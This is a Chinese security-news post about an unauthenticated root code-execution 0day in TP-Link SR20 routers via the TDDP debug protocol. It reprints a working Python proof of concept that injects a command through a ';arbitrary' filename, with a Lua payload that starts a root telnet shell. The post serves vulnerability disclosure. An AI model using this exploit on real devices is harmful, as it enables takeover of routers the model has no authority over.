微慑信息网

TP-Link SR20 路由器远程代码执行 0day(含PoC)

TP-Link SR20智能家居路由器和集线器(及其它相关TP-Link智能设备)正遭受任意代码执行漏洞(ACE)的威胁,此漏洞允许内网攻击者以root权限执行任意命令

该漏洞被Google安全开发人员Matthew Garrett于本月27号在Twitter上公布。公布的原因是他去年12月份将相关漏洞报告提交给TP-Link(相关网站提示1~3日回复)后没有收到任何回复。由于该漏洞接收平台漏洞详情描述字段限制500字不能提供完整的漏洞报告他又在几周后通过推特联系相关负责人亦没有任何回复。

0day允许攻击者以root身份执行任意代码,他在Twitter中解释,0day来自此前已经被发现多个漏洞的TP-Link调试协议“TDDP”。TDDP允许在设备上执行两种类型的命令:不需要身份验证和需要管理员身份验证。

不需要身份验证的更容易遭受黑客攻击,它允许很多类型的命令执行,其中一个命令是0x1F,请求0x01 -(好像是某个配置验证),允许攻击者发送包括文件名、分号和参数的命令来启动进程。

TP-Link路由器通过普通文件传输协议(TFTP)向机器发送特制请求。一旦连接到攻击者的机器,SR20智能集线器通过TFTP请求文件名,将其导入LUA解释器并将参数传递给刚导入的文件中的config_test()函数。解释器以root身份运行。接下来,os.execute()将允许未经身份验证的攻击者以root身份执行任何命令,从而完全控制TP-Link SR20设备。

有兴趣的同学可以下载SR20二进制固件研究下,地址如下:

https://www.tp-link.com/us/support/download/sr20/#Firmware

 

POC:


#!/usr/bin/python3

# Create /testfile in your tftp root directory with the following contents:
#
#function config_test(config)
#  os.execute("telnetd -l /bin/login.sh")
#end
#
# Replace 192.168.0.1 with the IP address of the vulnerable device

import binascii
import socket

port_send = 1040
port_receive = 61000

tddp_ver = "01"
tddp_command = "31"
tddp_req = "01"
tddp_reply = "00"
tddp_padding = "%0.16X" % 00

tddp_packet = "".join([tddp_ver, tddp_command, tddp_req, tddp_reply, tddp_padding])

sock_receive = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock_receive.bind(('', port_receive))

# Send a request
sock_send = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
packet = binascii.unhexlify(tddp_packet)
packet = packet + b"/testfile;arbitrary"
print(packet)
sock_send.sendto(packet, ("192.168.0.1", port_send))
sock_send.close()

response, addr = sock_receive.recvfrom(1024)
r = response.encode('hex')
print(r)

参考链接:

1.https://www.coresecurity.com/advisories/tp-link-tddp-multiple-vulnerabilities

2.https://blog.senr.io/blog/cve-2017-9466-why-is-my-router-blinking-morse-code

3.https://www.tp-link.com/us/press/security-advisory/

4.https://mjg59.dreamwidth.org/51672.html

赞(0) 打赏
转载请附本站链接,未经允许不得转载,,谢谢:微慑信息网-VulSee.com » TP-Link SR20 路由器远程代码执行 0day(含PoC)

评论 抢沙发

微慑信息网 专注工匠精神

微慑信息网-VulSee.com-关注前沿安全态势,聚合网络安全漏洞信息,分享安全文档案例

访问我们联系我们

觉得文章有用就打赏一下文章作者

非常感谢你的打赏,我们将继续提供更多优质内容,让我们一起创建更加美好的网络世界!

支付宝扫一扫打赏

微信扫一扫打赏

登录

找回密码

注册